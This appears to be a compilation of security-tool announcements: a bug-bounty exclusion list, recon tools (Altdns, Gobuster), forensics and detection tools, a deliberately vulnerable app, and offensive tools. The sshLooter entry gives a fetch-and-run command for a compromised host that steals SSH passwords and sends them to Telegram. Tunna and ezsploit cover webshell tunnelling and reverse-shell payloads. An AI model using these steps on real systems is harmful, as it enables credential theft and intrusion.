  • Missing HTTP security headers
  • Security best practices without accompanying Proof-of-Concept exploitation
  • Denial of Service Attacks.
  • Fingerprinting / banner disclosure on common/public services.
  • Clickjacking and issues only exploitable through clickjacking.
  • CSRF on non-sensitive forms.
  • Lack of Secure/HTTPOnly flags on non-sensitive Cookies.
  • OPTIONS HTTP method enabled
  • HTTPS Mixed Content Scripts
  • Known vulnerable libraries
  • Attacks on Third Party Ad Services
  • Username / email enumeration via Forgot Password or Login page
  • Missing HTTP security headers
  • Strict-Transport-Security Not Enabled For HTTPS
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
  • Content-Security-Policy-Report-Only
  • SSL Issues, e.g.
  • SSL Attacks such as BEAST, BREACH, Renegotiation attack
  • SSL Forward secrecy not enabled
  • SSL weak / insecure cipher suites
  • Lack of SPF records (Email Spoofing)
  • Auto-complete enabled on password fields
  • HTTP enabled
  • Session ID or Login Sent Over HTTP
  • Insecure Cookies
  • Cross-Domain.xml Allows All Domains
  • HTML5 Allowed Domains
  • Cross Origin Policy
  • Content Sniffing Not Disabled
  • Password Reset Account Enumeration
  • HTML Form Abuse (Denial of Service)
  • Weak HSTS Age (86,000 or less)
  • Lack of Password Security Policy (Brute Forcable Passwords)
  • Physical Testing
  • Denial of service attacks
  • Resource Exhaustion attacks
  • Issues related to rate limiting
  • Login or Forgot Password page brute force and account lockout not enforced
  • api*.netflix.com listens on port 80
  • Cross-domain access policy scoped to *.netflix.com
  • Username / Email Enumeration
  • via Login Page error message
  • via Forgot Password error message
  • via Registration
  • Weak password
  • Weak Captcha / Captcha bypass
  • Lack of Secure/HTTPOnly flags on cookies
  • Cookie valid after logout
  • Cookie valid after password reset
  • Cookie expiration
  • Forgot password autologin
  • Autologin token reuse
  • Same Site Scripting
  • SSL Issues, e.g.
  • SSL Attacks such as BEAST, BREACH, Renegotiation attack
  • SSL Forward secrecy not enabled
  • SSL weak / insecure cipher suites
  • SSL vulnerabilities related to configuration or version
  • Descriptive error messages (e.g. Stack Traces, application or server errors).
  • HTTP 404 codes/pages or other HTTP non-200 codes/pages.
  • Fingerprinting/banner disclosure on common/public services.
  • Disclosure of known public files or directories, (e.g. robots.txt).
  • Clickjacking and issues only exploitable through clickjacking.
  • CSRF on forms that are available to anonymous users (e.g. the contact form).
  • Logout Cross-Site Request Forgery (logout CSRF).
  • Missing CSRF protection on non-sensitive functionality
  • Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
  • Incorrect Charset
  • HTML Autocomplete
  • OPTIONS HTTP method enabled
  • TRACE HTTP method enabled
  • Missing HTTP security headers, specifically
  • (https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.
  • Strict-Transport-Security
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
  • Content-Security-Policy-Report-Only
  • Issues only present in old browsers/old plugins/end-of-life software browsers
  • IE < 9
  • Chrome < 40
  • Firefox < 35
  • Safari < 7
  • Opera < 13
  • Vulnerability reports related to the reported version numbers of web servers, services, or frameworks



Altdns - Generates permutations, alterations and mutations of subdomains and then resolves them

Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging), as well as a list of subdomains that you know of.
From these two lists that are provided as input to altdns, the tool then generates a massive output of "altered" or "mutated" potential subdomains that could be present. It saves this output so that it can then be used by your favourite DNS bruteforcing tool.
Alternatively, the -r flag can be passed to altdns so that once this output is generated, the tool can then resolve these subdomains (multi-threaded) and save the results to a file.
Altdns works best with large datasets. Having an initial dataset of 200 or more subdomains should churn out some valid subdomains via the alterations generated.

Installation
pip install -r requirements.txt

Usage
# ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
  • subdomains.txt contains the known subdomains for an organization
  • data_output is a file that will contain the massive list of altered and permuted subdomains
  • words.txt is your list of words that you'd like to permute your current subdomains with (i.e. admin, staging, dev, qa) - one word per line
  • the -r command resolves each generated, permuted subdomain
  • the -s command tells altdns where to save the results of the resolved permuted subdomains. results_output.txt will contain the final list of permuted subdomains found that are valid and have a DNS record.
  • the -t command limits how many threads the resolver will use simultaneously
  • -d 1.2.3.4 overrides the system default DNS resolver and will use the specified IP address as the resolving server. Setting this to the authoritative DNS server of the target domain may increase resolution performance
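The kind of alterations altdns generates can be sketched in a few lines of Python (an illustrative example, not the tool's actual code — the `permute` function and its variants are assumptions): each known subdomain is combined with each word as a new level, a dash-prefix, and a dash-suffix.

```python
def permute(subdomain, domain, words):
    """Generate altdns-style candidate subdomains for one known subdomain."""
    prefix = subdomain[: -len(domain) - 1]  # e.g. "api" from "api.example.com"
    candidates = set()
    for w in words:
        candidates.add(f"{w}.{subdomain}")        # word inserted as a new level
        candidates.add(f"{w}-{prefix}.{domain}")  # word-prefix variant
        candidates.add(f"{prefix}-{w}.{domain}")  # word-suffix variant
    return sorted(candidates)

print(permute("api.example.com", "example.com", ["dev", "staging"]))
```

With an initial dataset of hundreds of subdomains, the cross product of subdomains and words quickly produces the "massive output" mentioned above.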

Screenshots




ezsploit - Linux Bash Script Automation For Metasploit



Command-line script for automating Metasploit functions:
  • Checks for the Metasploit service and starts it if not present
  • Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac
  • Start multiple meterpreter reverse_tcp listeners
  • Assistance with building basic persistence options and scripts
  • Armitage launcher
  • Drop into Msfconsole
  • Some other fun stuff :)

sshLooter - Script To Steal Passwords From SSH


Script to steal passwords from SSH.

Install
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration
Edit install.sh and add your Telegram bot API token and your user ID.
Message @BotFather on Telegram to create a bot, and @userinfobot to get your user ID.

Usage
On your server, execute:
python -m SimpleHTTPServer

On the compromised machine, execute:
curl http://yourserverip:8000/install.sh | bash

Original script from
ChokePoint

Post about this script
Stealing SSH credentials: Another Approach.


PcapXray - A Network Forensics Tool To visualize a Packet Capture offline as a Network Diagram

PcapXray is a network forensics tool to visualize a packet capture offline as a network diagram, including device identification, highlighting of important communication, and file extraction.

PcapXray Design Specification

Goal:
Given a Pcap File, plot a network diagram displaying hosts in the network, network traffic, highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.

Problem:

Solution: Speed up the investigation process
  • Make a network diagram with the following features from a Pcap file

Tool Highlights:
  • Network Diagram – Summary Network Diagram of full network
  • Information:
  • Traffic with Server Details
  • Tor Traffic
  • Possible Malicious traffic
  • Data Obtained from Packet in Report – Device/Traffic/Payloads
  • Device Details

Tool Image:



Components:
  • Network Diagram
  • Device/Traffic Details and Analysis
  • Malicious Traffic Identification
  • Tor Traffic
  • GUI – a gui with options to upload pcap file and display the network diagram

Python Libraries Used – all of these libraries are required for functionality:
  • Tkinter and TTK – install from pip or apt-get – ensure Tkinter and Graphviz are installed (most Linux distributions include them by default)
    • apt install python-tk
    • apt install graphviz
  • All these are included in the requirements.txt file
    • Scapy – rdpcap to read the packets from the pcap file
    • Ipwhois – to obtain whois information from ip
    • Netaddr – to check ip information type
    • Pillow – image processing library
    • Stem – tor consensus data fetch library
    • pyGraphviz – plot graph
    • Networkx – plot graph
    • Matplotlib – plot graph
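PcapXray reads captures with Scapy's rdpcap; for readers unfamiliar with the underlying format, here is a minimal stdlib-only sketch (not the tool's code) of parsing the classic pcap global header that every such file starts with:

```python
import struct

# Classic pcap global header: magic, version major/minor, thiszone,
# sigfigs, snaplen, network (link-layer type) - 24 bytes total.
PCAP_GLOBAL_HDR = struct.Struct("<IHHiIII")

def read_pcap_header(data: bytes) -> dict:
    magic, vmaj, vmin, _tz, _sf, snaplen, linktype = PCAP_GLOBAL_HDR.unpack_from(data)
    if magic != 0xA1B2C3D4:  # little-endian, microsecond timestamps
        raise ValueError("not a little-endian classic pcap file")
    return {"version": (vmaj, vmin), "snaplen": snaplen, "linktype": linktype}

# A hand-built header: pcap 2.4, snaplen 65535, linktype 1 (Ethernet).
sample = PCAP_GLOBAL_HDR.pack(0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
print(read_pcap_header(sample))
```

Scapy hides all of this, but the header explains why the whole file must be read before any per-packet analysis can begin.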

Challenges:
  • Instability of the Tk GUI:
    • The GUI choice was between Django and Tk; Tk was chosen for a simple local interface, but its instability caused a number of problems
  • Graph Plotting:
    • Plotting a readable network graph from the data obtained took quite an effort; several libraries were tried before settling on one
  • Performance and Timing:
    • The performance and timing of the whole application were a big challenge across the various data-gathering and output-generation stages

Known Bugs:
  • Memory Hogging
    • Memory hogging can occur on systems with less RAM, since all the data parsed from the pcap file is held in memory
    • Should be fixed by moving the data into a database rather than keeping it in memory
  • Race Condition
    • Due to the mainloop of the Tk GUI, other threads can hit a race condition
    • Should be fixed by moving to a better-structured Tk implementation or a web GUI
  • Tk GUI Instability:
    • Same reason as above
  • Current workaround: if any of the above issues occurs, the progress bar keeps running and no output is generated; restarting the app is required.

Future:
  • Change the storage from JSON to SQLite or another proper database, to address the memory hogging
  • Change the frontend to a web-based one, such as Django
  • Make the application more stable


Tunna - Set Of Tools Which Will Wrap And Tunnel Any TCP Communication Over HTTP


Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

SUMMARY
TLDR: Tunnels TCP connections over HTTP
In a fully firewalled environment (inbound and outbound connections restricted, except for the webserver port),
the webshell can be used to connect to any service on the remote host. This is a local connection on a local port at the remote host and should be allowed by the firewall.
The webshell reads data from the service port, wraps it in HTTP and sends it as an HTTP response to the local proxy.
The local proxy unwraps the data and writes it to its local port, where the client program is connected.
When the local proxy receives data on the local port, it sends it over to the webshell as an HTTP POST.
The webshell reads the data from the HTTP POST and writes it to the service port,
and the cycle repeats.
Only the webserver port needs to be open (typically 80/443). The whole communication (externally) is done over the HTTP protocol.
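The wrap/unwrap step above can be pictured with a toy example (illustrative framing only, not Tunna's actual code; the URL and header set are assumptions): raw TCP bytes ride in the body of an HTTP message, and the receiving side strips the headers to recover them.

```python
def wrap(payload: bytes, host: str = "10.3.3.1") -> bytes:
    """Wrap raw TCP bytes in a bare-bones HTTP POST."""
    headers = (
        f"POST /conn.aspx?proxy HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(payload)}\r\n\r\n"
    )
    return headers.encode() + payload

def unwrap(message: bytes) -> bytes:
    """Strip the HTTP headers to recover the raw TCP bytes."""
    return message.split(b"\r\n\r\n", 1)[1]

data = b"\x05\x01\x00"  # any raw bytes, e.g. a SOCKS handshake
assert unwrap(wrap(data)) == data
```

To a firewall or proxy in the middle, each such message looks like ordinary web traffic, which is the entire point of the technique.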

USAGE
python proxy.py -u <remoteurl> -l <localport> [options]

Options
--help, -h show this help message and exit
--url=URL, -u URL url of the remote webshell
--lport=LOCAL_PORT, -l LOCAL_PORT local listening port
--verbose, -v Verbose (outputs packet size)
--buffer=BUFFERSIZE, -b BUFFERSIZE HTTP request size (some webshells have limitations on the size)

No SOCKS Options
Options are ignored if SOCKS proxy is used
--no-socks, -n Do not use Socks Proxy
--rport=REMOTE_PORT, -r REMOTE_PORT remote port of service for the webshell to connect to
--addr=REMOTE_IP, -a REMOTE_IP address for remote webshell to connect to (default = 127.0.0.1)

Upstream Proxy Options
Tunnel connection through a local Proxy
--up-proxy=UPPROXY, -x UPPROXY Upstream proxy (http://proxyserver.com:3128)
--auth, -A Upstream proxy requires authentication

Advanced Options
--ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging thread interval (default = 0.5)
--start-ping, -s Start the pinging thread first - some services send data first (eg. SSH)
--cookie, -C Request cookies
--authentication, -t Basic authentication
  • See limitations
example usage: python proxy.py -u http://10.3.3.1/conn.aspx -l 8000 -v
# This will start a Local SOCKS Proxy Server at port 8000
# This connection will be wrapped over HTTP and unwrapped at the remote server

python proxy.py -u http://10.3.3.1/conn.aspx -l 8000 -x https://192.168.1.100:3128 -A -v

# This will start a Local SOCKS Proxy Server at port 8000
# It will connect through a Local Proxy (https://192.168.1.100:3128) that requires authentication
# to the remote Tunna webshell

python proxy.py -u http://10.3.3.1/conn.aspx -l 4444 -r 3389 -b 8192 -v --no-socks

# This will initiate a connection between the webshell and Remote host RDP (3389) service
# The RDP client can connect on localhost port 4444
# This connection will be wrapped over HTTP

Prerequisites
The ability to upload a webshell on the remote server

LIMITATIONS / KNOWN BUGS / HACKS
This is POC code and might cause a DoS of the server.
All efforts to clean up after execution or on error have been made (no promises)

Based on local tests:
* JSP buffer needs to be limited (buffer option):
4096 worked in Linux Apache Tomcat
1024 worked in XAMPP Apache Tomcat (slow)
* More than that created problems with bytes missing at the remote socket
eg: ruby proxy.rb -u http://10.3.3.1/conn.jsp -l 4444 -r 3389 -b 1024 -v

* Sockets not enabled by default php windows (IIS + PHP)

* Carriage returns on webshells (outside the code):
get sent in responses / get written to the local socket --> corrupt the packets

* PHP webshell for windows: the loop function DoS'es the remote socket:
sleep function added -> works but a bit slow
* PHP webshell needs newline characters removed at the end of the file (after "?>"),
as these will get sent in every response and confuse Tunna

FILES
Webshells:
conn.jsp Tested on Apache Tomcat (windows + linux)
conn.aspx Tested on IIS 6+8 (windows server 2003/2012)
conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

WebServer:
webserver.py Tested with Python 2.6.5

Proxies:
proxy.py Tested with Python 2.6.5

Technical Details

Architecture decisions
Data is sent raw in the HTTP Post Body (no post variable)

Instructions / configuration is sent to the webshell as URL parameters (HTTP Get)
Data is sent in the HTTP body (HTTP Post)

WebSockets are not used: they are not supported by default by most webservers.
Asynchronous HTTP responses are not really possible,
so the proxy queries the server constantly (default: every 0.5 seconds).

INITIATION PHASE
1st packet initiates a session with the webshell - gets a cookie back eg: http://webserver/conn.ext?proxy
2nd packet sends connection configuration options to the webshell eg: http://webserver/conn.ext?proxy&port=4444&ip=127.0.0.1
IP and port for the webshell to connect to
This is a threaded request:
In php this request will go into an infinite loop
to keep the webshell socket connection alive
In other webshells [OK] is received back

TUNNA CLIENT
A local socket is created, to which the client program connects. Once the client is connected, the pinging thread is initiated and execution starts. Any data on the socket (from the client) is read and sent as an HTTP POST request. Any data on the webshell socket is sent as the response to the POST request.

PINGING THREAD
Because HTTP responses cannot be asynchronous, this thread performs HTTP GET requests against the webshell at a fixed interval (default 0.5 sec). If the webshell has data to send, it sends it as the reply to this request; otherwise it sends an empty response.
In general: data from the local proxy is sent with HTTP POST; GET requests are made every 0.5 sec to query the webshell for data; any data on the webshell side is sent over as a response to one of these requests.

WEBSHELL
The webshell connects to a socket on the local or a remote host. Any data written to that socket is sent back to the proxy as the reply to a request (POST/GET). Any data received in a POST is written to the socket.

NOTES
All requests need to have the URL parameter "proxy" set to be handled by the webshell (http://webserver/conn.ext?proxy)

AT EXIT / AT ERROR
Kills all threads and closes the local socket. Sends proxy&close to the webshell, which kills the remote threads and closes its socket.

SOCKS
The SOCKS support is an add-on module for Tunna. Locally, a separate thread handles the connection requests and traffic: it adds a header that specifies the port and the size of the packet and forwards it to Tunna. Tunna sends it over to the remote webserver, removes the HTTP headers and forwards the packet to the remote SOCKS proxy. The remote SOCKS proxy initiates the connection and maps the received port to the local port. If the remote SOCKS proxy receives data from the service, it looks at the mapping table, finds the port it needs to respond to, and adds that port as a header so the local SOCKS proxy knows where to forward the data. Any traffic from the received port is forwarded to the local port and vice versa.
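The port-and-size header described above can be sketched with a fixed-size struct prefix (an illustrative framing, not Tunna's actual wire format — the field widths are assumptions):

```python
import struct

FRAME_HDR = struct.Struct("!HI")  # port (2 bytes), payload size (4 bytes)

def frame(port: int, payload: bytes) -> bytes:
    """Prefix a payload with the port it belongs to and its length."""
    return FRAME_HDR.pack(port, len(payload)) + payload

def deframe(blob: bytes):
    """Recover (port, payload) from a framed packet."""
    port, size = FRAME_HDR.unpack_from(blob)
    return port, blob[FRAME_HDR.size : FRAME_HDR.size + size]

port, data = deframe(frame(3389, b"rdp bytes"))
print(port, data)
```

The port field is what lets one HTTP channel multiplex several SOCKS connections: each side consults its port mapping table to route the payload to the right socket.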


Gobuster - Directory/File & DNS Busting Tool Written In Go


Gobuster is a tool used to brute-force:
  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).

Oh dear God.. WHY!?
Because I wanted:
  1. ... something that didn't have a fat Java GUI (console FTW).
  2. ... to build something that just worked on the command line.
  3. ... something that did not do recursive brute force.
  4. ... something that allowed me to brute force folders and multiple extensions at once.
  5. ... something that compiled to native on multiple platforms.
  6. ... something that was faster than an interpreted script (such as Python).
  7. ... something that didn't require a runtime.
  8. ... use something that was good with concurrency (hence Go).
  9. ... to build something in Go that wasn't totally useless.

Common Command line options
  • -fw - Force processing of a domain with wildcard results.
  • -m <mode> - which mode to use, either dir or dns (default: dir)
  • -q - disables banner/underline output.
  • -t <threads> - number of threads to run (default: 10).
  • -u <url/domain> - full URL (including scheme), or base domain name.
  • -v - verbose output (show all results).
  • -w <wordlist> - path to the wordlist used for brute forcing.

Command line options for dns mode
  • -cn - show CNAME records (cannot be used with '-i' option).
  • -i - show all IP addresses for the result.

Command line options for dir mode
  • -a <user agent string> - specify a user agent string to send in the request header.
  • -c <http cookies> - use this to specify any cookies that you might need (simulating auth).
  • -e - specify extended mode that renders the full URL.
  • -f - append / for directory brute forces.
  • -k - Skip verification of SSL certificates.
  • -l - show the length of the response.
  • -n - "no status" mode, disables the output of the result's status code.
  • -o <file> - specify a file name to write the output to.
  • -p <proxy url> - specify a proxy to use for all requests (scheme must match the URL scheme).
  • -r - follow redirects.
  • -s <status codes> - comma-separated set of the list of status codes to be deemed a "positive" (default: 200,204,301,302,307).
  • -x <extensions> - list of extensions to check for, if any.
  • -P <password> - HTTP Authorization password (Basic Auth only, prompted if missing).
  • -U <username> - HTTP Authorization username (Basic Auth only).
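The dir-mode word/extension expansion (point 4 of the motivation list) can be pictured as follows — an illustrative Python sketch of the idea, not Gobuster's Go code: each wordlist entry is tried bare and once per extension given with -x.

```python
def candidates(base_url, words, extensions):
    """Yield the URLs a dir-mode run would request: word, then word+ext for each ext."""
    for word in words:
        yield f"{base_url}/{word}"
        for ext in extensions:
            yield f"{base_url}/{word}{ext}"

urls = list(candidates("https://mysite.com", ["admin", "index"], [".php", ".html"]))
print(urls)
```

Each candidate URL is then requested concurrently by the worker threads (-t), and responses whose status codes match the -s list are reported as hits.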

Building
Since this tool is written in Go, you need to install the Go language/compiler/etc. Full details of installation and set up can be found on the Go language website. Once installed, you have two options.

Compiling
gobuster now has external dependencies, and so they need to be pulled in first:
gobuster $ go get && go build
This will create a gobuster binary for you. If you want to install it in the $GOPATH/bin folder you can run:
gobuster $ go install

Running as a script
gobuster$ go run main.go <parameters>

Wordlists via STDIN
Wordlists can be piped into gobuster via stdin:
hashcat -a 3 --stdout ?l | gobuster -u https://mysite.com
Note: If the -w option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate.

Examples

dir mode
Command line might look like this:
$ gobuster -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html
Default options looks like this:
$ gobuster -u http://buffered.io/ -w words.txt

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : words.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/index (Status: 200)
/posts (Status: 301)
/contact (Status: 301)
=====================================================
Default options with status codes disabled looks like this:
$ gobuster -u http://buffered.io/ -w words.txt -n

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : words.txt
[+] Status codes : 200,204,301,302,307
[+] No status : true
=====================================================
/index
/posts
/contact
=====================================================
Verbose output looks like this:
$ gobuster -u http://buffered.io/ -w words.txt -v

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : words.txt
[+] Status codes : 200,204,301,302,307
[+] Verbose : true
=====================================================
Found : /index (Status: 200)
Missed: /derp (Status: 404)
Found : /posts (Status: 301)
Found : /contact (Status: 301)
=====================================================
Example showing content length:
$ gobuster -u http://buffered.io/ -w words.txt -l

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : /tmp/words
[+] Status codes : 301,302,307,200,204
[+] Show length : true
=====================================================
/contact (Status: 301)
/posts (Status: 301)
/index (Status: 200) [Size: 61481]
=====================================================
Quiet output, with status disabled and expanded mode looks like this ("grep mode"):
$ gobuster -u http://buffered.io/ -w words.txt -q -n -e
http://buffered.io/posts
http://buffered.io/contact
http://buffered.io/index

dns mode
Command line might look like this:
$ gobuster -m dns -u mysite.com -t 50 -w common-names.txt
Normal sample run goes like this:
$ gobuster -m dns -w subdomains.txt -u google.com

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : subdomains.txt
=====================================================
Found: m.google.com
Found: admin.google.com
Found: mobile.google.com
Found: www.google.com
Found: search.google.com
Found: chrome.google.com
Found: ns1.google.com
Found: store.google.com
Found: wap.google.com
Found: support.google.com
Found: directory.google.com
Found: translate.google.com
Found: news.google.com
Found: music.google.com
Found: mail.google.com
Found: blog.google.com
Found: cse.google.com
Found: local.google.com
=====================================================
Show IP sample run goes like this:
$ gobuster -m dns -w subdomains.txt -u google.com -i

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : subdomains.txt
[+] Verbose : true
=====================================================
Found: chrome.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: m.google.com [216.58.220.107, 2404:6800:4006:801::200b]
Found: www.google.com [74.125.237.179, 74.125.237.177, 74.125.237.178, 74.125.237.180, 74.125.237.176, 2404:6800:4006:801::2004]
Found: search.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: admin.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: store.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: mobile.google.com [216.58.220.107, 2404:6800:4006:801::200b]
Found: ns1.google.com [216.239.32.10]
Found: directory.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: translate.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: cse.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: local.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: music.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: wap.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: blog.google.com [216.58.220.105, 2404:6800:4006:801::2009]
Found: support.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: news.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: mail.google.com [216.58.220.101, 2404:6800:4006:801::2005]
=====================================================
Base domain validation warning when the base domain fails to resolve. This is a warning rather than a failure in case the user fat-fingers while typing the domain.
$ gobuster -m dns -w subdomains.txt -u yp.to -i

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : yp.to
[+] Threads : 10
[+] Wordlist : /tmp/test.txt
=====================================================
[-] Unable to validate base domain: yp.to
Found: cr.yp.to [131.155.70.11, 131.155.70.13]
=====================================================
Wildcard DNS is also detected properly:
$ gobuster -w subdomainsbig.txt -u doesntexist.com -m dns

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : doesntexist.com
[+] Threads : 10
[+] Wordlist : subdomainsbig.txt
=====================================================
[-] Wildcard DNS found. IP address(es): 123.123.123.123
[-] To force processing of Wildcard DNS, specify the '-fw' switch.
=====================================================
If the user wants to force processing of a domain that has wildcard entries, use -fw:
$ gobuster -w subdomainsbig.txt -u doesntexist.com -m dns -fw

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : doesntexist.com
[+] Threads : 10
[+] Wordlist : subdomainsbig.txt
=====================================================
[-] Wildcard DNS found. IP address(es): 123.123.123.123
Found: email.doesntexist.com
^C[!] Keyboard interrupt detected, terminating.
=====================================================


Dr. Mine - Tool To Aid Automatic Detection Of In-Browser Cryptojacking


Dr. Mine is a Node script written to aid automatic detection of in-browser cryptojacking. The most accurate way to detect things that happen in a browser is via the browser itself; thus, Dr. Mine uses Puppeteer to automate the browser and catches any requests to online cryptominers. When a request to any online cryptominer is detected, it flags the corresponding URL and the cryptominer in use. Therefore, however the code is written or obfuscated, Dr. Mine will catch it (as long as the miner is in the list). The list of online cryptominers is fetched from CoinBlockerLists. The result is also saved to a file for later use.
  • Can also process single URL passed directly via command line
  • All links found on the first (requested) page are also processed, if same-origin
  • All configurable options are stored in config.js allowing easier modifications
  • To reduce extra bandwidth and processing, all requests to resources like fonts, images, media, stylesheets are aborted
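The core detection idea — comparing each requested hostname against a miner blocklist — can be sketched like this (illustrative only; the real tool intercepts requests via Puppeteer and fetches its live list from CoinBlockerLists, so the hard-coded domains here are stand-ins):

```python
from urllib.parse import urlparse

# Hypothetical stand-in for the CoinBlockerLists feed.
MINER_DOMAINS = {"coinhive.com", "crypto-loot.com", "coin-have.com"}

def flag_request(url: str):
    """Return the matched miner domain if the request goes to a known miner."""
    host = urlparse(url).hostname or ""
    for domain in MINER_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None

print(flag_request("https://coinhive.com/lib/coinhive.min.js"))
```

Because the match happens on the outgoing request rather than on page source, obfuscated loader code makes no difference — the request to the miner's domain still has to be made.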

Pre-requisites & Installation
The following 3 lines of commands should set everything up and running on Arch distros;
pacman -S nodejs npm
git clone https://github.com/1lastBr3ath/drmine.git && cd drmine
npm i --save puppeteer
Please make sure your version of node is 7.6.0 or greater. For any installation assistance or instructions on specific distros, please refer to respective documents;
https://nodejs.org/en/download/package-manager/
https://docs.npmjs.com/getting-started/installing-node
https://github.com/GoogleChrome/puppeteer#installation

Usage
Dr. Mine accepts either a URL or a file which is expected to contain valid URLs. Usage is as simple as;
node drmine.js list.txt
A sample list.txt looks like;
http://cm2.pw
http://cm2.pw/xmr/
https://example.com/
An example of passing URL directly via command line;
node drmine.js http://cm2.pw/xmr/



DVHMA - Damn Vulnerable Hybrid Mobile App (For Android) That Intentionally Contains Vulnerabilities


Damn Vulnerable Hybrid Mobile App (DVHMA) is a hybrid mobile app (for Android) that intentionally contains vulnerabilities. Its purpose is to enable security professionals to test their tools and techniques legally, and to help developers better understand the common pitfalls in developing hybrid mobile apps securely.

Motivation and Scope
This app is developed to study pitfalls in developing hybrid apps, e.g., using Apache Cordova or SAP Kapsel, securely. Currently, the main focus is to develop a deeper understanding of injection vulnerabilities that exploit the JavaScript to Java bridge.

Installation

Prerequisites
We assume that the
Moreover, we assume a basic familiarity with the build system of Apache Cordova.

Building DVHMA

Setting Environment Variables
export ANDROID_HOME=<Android SDK Installation Directory>
export PATH=$ANDROID_HOME/tools:$PATH
export PATH=$ANDROID_HOME/platform-tools:$PATH

Compiling DVHMA
cd DVHMA-Featherweight
cordova plugin add ../plugins/DVHMA-Storage
cordova plugin add ../plugins/DVHMA-WebIntent
cordova platform add android
cordova compile android

Running DVHMA in an Emulator
cordova run android 

Team Members
The development of this application started as part of the project ZertApps. ZertApps was a collaborative research project funded by the German Ministry for Research and Education. It is now developed and maintained by the Software Assurance & Security Research Team at The University of Sheffield, UK.

The core developers of DVHMA are:

Publications


MADLIRA - Malware detection using learning and information retrieval for Android

MADLIRA is a tool for Android malware detection. It consists of two components: a TFIDF component and an SVM learning component. In general, it takes as input a set of malwares and benwares and then extracts the malicious behaviors (TFIDF component) or computes a training model (SVM classifier). It then uses this knowledge to detect malicious behaviors in Android applications.
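As background for the TFIDF component, term weighting of the classic tf-idf kind can be sketched in a few lines — a generic illustration of the weighting scheme, not MADLIRA's implementation (which operates on extracted behavior graphs, not raw token lists):

```python
import math
from collections import Counter

def tfidf(docs):
    """Compute tf-idf weights for a list of token lists (one list per document)."""
    n = len(docs)
    df = Counter(t for doc in docs for t in set(doc))  # document frequency
    weights = []
    for doc in docs:
        tf = Counter(doc)
        weights.append({t: (c / len(doc)) * math.log(n / df[t]) for t, c in tf.items()})
    return weights

# Toy "documents": API-call sequences from two hypothetical apps.
docs = [["sendSMS", "getDeviceId", "sendSMS"], ["openFile", "getDeviceId"]]
print(tfidf(docs)[0])
```

Behaviors that appear in malware but rarely in benware receive high weights, which is what lets the component single them out as malicious specifications.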

Installing
Download file MADLIRA.7z and decompress it.

Installed Data:
  • MADLIRA.jar is the main application.
  • noAPI.txt declares the prefix of APIs.
  • family.txt lists malwares by family.
  • Folder TrainData contains the training configuration and training model.
  • Folder Samples contains sample data.
  • Folder TempData contains data for kernel computation.

Functionality
This tool has two main components: a TFIDF component and an SVM component.

TFIDF component
Command: MADLIRA TFIDF
For this component, there are two functions: the training function (Malicious behavior extraction) and the test function (Malicious behavior detection)

Malicious behavior extraction
  • Collect benign applications and malicious applications and put them in folders named benignApkFolder and maliciousApkFolder, respectively.
  • Prepare training data and pack them in two files named benignPack and maliciousPack by using the command:
MADLIRA TFIDF packAPK -PB benignApkFolder -B benignPack -PM maliciousApkFolder -M maliciousPack
  • Extracting malicious behaviors from two packed files (benignPack and maliciousPack) by using the command:
MADLIRA TFIDF train -B benignPack -M maliciousPack

Malicious behavior detection
  • Collect new applications and put them in a folder named checkApk.
  • Detect malicious behaviors of applications in the folder checkApk by using the command:
MADLIRA TFIDF check -S checkApk
Command:
MADLIRA TFIDF train <Options>
